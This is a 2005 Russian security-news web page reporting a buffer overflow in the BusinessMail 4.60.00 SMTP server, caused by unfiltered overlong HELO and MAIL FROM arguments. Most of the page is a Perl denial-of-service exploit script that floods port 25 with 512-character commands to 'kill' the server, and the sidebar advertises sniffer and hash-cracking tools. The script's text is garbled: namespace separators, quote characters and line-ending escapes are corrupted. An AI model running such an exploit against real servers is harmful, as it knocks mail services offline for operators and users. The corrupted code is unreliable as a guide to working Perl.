СОДЕРЖАНИЕ:
  ДОМОЙ
  НОВОСТИ  
  IT АКАДЕМИЯ
  WAP-ВЕРСИЯ
  ФОРУМ
  БЕЗОПАСНОСТЬ
  ПРОГРАММИРОВАНИЕ
  ИНСТРУМЕНТ ВЕБМАСТЕРА
  ВСЁ ДЛЯ КПК
  СТАТЬИ NEW
  СОФТ
  ВИДЕО
  X-INFO
  ПРОКСИ ЛИСТ
  IT МУЗЫКА
  АНЕКДОТЫ
  ССЫЛКИ
  ТЕХ. ПОДДЕРЖКА
  ПРАВООБЛАДАТЕЛЯМ
  О НАС
ВАШ IP АДРЕС:
18.191.189.124
Человек на сайте На сайте: 394 человек(а)
Ђдминистрация никак не связан с авторами и содержимым ссылок
Рђеклама




Cервер : irc.comp-info.ru Порт : 6667 Канал : #comp-info


Архив Новостей  

Переволнение буффера в BusinessMail почтовой серверной системе версии

9 августа 2005 | ASSCOL | Архив Новостей

Переволнение буффера в BusinessMail почтовой серверной системе версии 4.60.00

Детали: Комманды в SMTP HELO и MAIL FROM: не проверяються и не фильтруються.
Подставление длинного аргумента для HELO и MAIL FROM: приведёт к аварийному завершению работы приложения.

Уязвимые версии:
BusinnessMail email sever system 4.60.00

Патчи:
Производитель был осведомлен. Обновление будет выпушенно в кратчайшие сроки.

Обновление будет выложенно на оффециальном сайте производителя (www.netcplus.com)


Эксплоит:
#===== Start BusMail_SMTPDOS.pl =====                      
#                                        
# Usage: BusMail_SMTPDOS.pl                        
#     BusMail_SMTPDOS.pl 127.0.0.1                      
#                                        
# BusinessMail email server system 4.60.00                  
#                                        
# Download:                                  
# www.netcplus.com/                          
#                                        
##########################################                  
                                       
use IOSocket;                                
use strict;                                  
                                       
my($socket) = "";                                
                                       
if ($socket = IOSocketINET->new(PeerAddr => $ARGV[0],            
                  PeerPort => «25»,              
                  Proto   => «TCP»))            
{                                        
    print «Attempting to kill BusinessMail SMTP server at $ARGV[0]:25…n»;
                                       
    sleep(1);                                
                                       
    print $socket "HELO " . «A» x 512 . «rn»;              
                                       
    sleep(1);                                
                                       
    print $socket «MAIL FROM:» . «A» x 512 . «rn»;            
                                       
    close($socket);                            
}                                        
else                                      
{                                        
    print «Cannot connect to $ARGV[0]:25n»;                
}

Комментариев: 0
Добавить комментарий

Ваше имя:  




Все материалы предоставляются как информация к размышлению. Лица, использующие данную информацию в противозаконных целях, могут быть привлечены к уголовной ответственности. Администрация сайта в этих случаях ответственности не несет.

/USR/MENU:
 ./HOME
 ./HOME/NEWS  
 ./HOME/IT_ACADEMY
 ./WAP
 ./FORUM
 ./SECURITY
 ./PROGRAMMING
 ./SOFT/4WEBMASTERS
 ./ALL4POCKETS
 ./USR/ARTICLESNEW
 ./TEMP/SOFT
 ./USR/ALL_VIDEO
 ./HOME/X-INFO
 ./TEMP/PROXYLIST
 ./IT_MUSIC
 ./JOKES
 ./HOME/LINKS
 ./USR/SUPPORT
 ./USR/POSSESSOR
 ./ABOUT_US
УТИЛИТЫ:

  Сниффер
  Лог сниффера
  MD5 и Base64
  Декодирование MD5 NEW
 Перекодировщик
  Проверить прокси
  Проверка анонимности
  Генерация пароля
  Скрипт определения IP
  Поиск информации
   Проверить IP (Whois)
   Узнать скорость закачки
   Добавить свой сайт в поисковые системы>
   Подсветка php-кода

ПОЛЕЗНАЯ ИНФОРМАЦИЯ:
  Список национальных доменных имен
  Компьютерные термины
  Смайлики
   Аналоги Win-программ в Linux
   Коды ответа HTTP сервера
   Записки невесты программиста

Опрос




Права на содержащиеся на сайте материалы принадлежат авторам.

Copyright Комп-Инфо.ру © 2005